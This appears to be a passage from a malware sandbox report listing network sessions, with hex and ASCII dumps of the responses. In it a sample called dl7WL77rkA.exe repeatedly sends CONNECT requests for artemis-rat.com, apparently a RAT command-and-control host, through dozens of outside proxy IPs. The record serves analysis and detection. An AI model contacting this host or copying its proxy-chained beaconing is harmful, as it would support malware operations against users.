                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.721920967 CET295INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 150
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            931192.168.2.55242191.202.230.21980803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.413666964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            932192.168.2.55247318.185.169.15031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.413671970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.717176914 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            933192.168.2.55242043.255.113.23280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.413779020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            934192.168.2.552464218.252.244.126803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.413836956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.729541063 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            935192.168.2.55243269.230.240.163326503876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.413837910 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.754379988 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.105214119 CET628INHTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
                                                                                                                                                                                                                                                            Data Raw:
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.107319117 CET628INHTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
                                                                                                                                                                                                                                                            Data Raw:
                                                                                                                                                                                                                                                            Data Ascii:


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            936192.168.2.552538192.252.216.8141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.413841009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            937192.168.2.551599128.199.251.21980003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.413964033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.445987940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.780123949 CET19INHTTP/1.0 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            938192.168.2.552572157.185.157.151265893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.413976908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            939192.168.2.55242945.11.95.16550383876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.414011002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            940192.168.2.55248747.243.177.21080883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.414613962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.193416119 CET325INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            941192.168.2.55243095.140.124.16110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.415015936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            942192.168.2.552433171.235.166.22240193876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.415360928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.762739897 CET228INHTTP/1.0 502 Bad Gateway
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 32 3e 3c 68 33 3e 48 6f 73 74 20 4e 6f 74 20 46 6f 75 6e 64 20 6f 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h2>502 Bad Gateway</h2><h3>Host Not Found or connection failed</h3></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            943192.168.2.55255746.51.249.13531283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.415596008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.680811882 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            944192.168.2.55241245.4.144.23241533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.416321039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            945192.168.2.55194059.15.28.7631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.427187920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.592360973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.007117987 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            946192.168.2.552499223.19.111.185803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.429307938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.092617989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.093195915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.092799902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.889781952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.702406883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.499022961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:04.093004942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:17.853588104 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:41.893565893 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
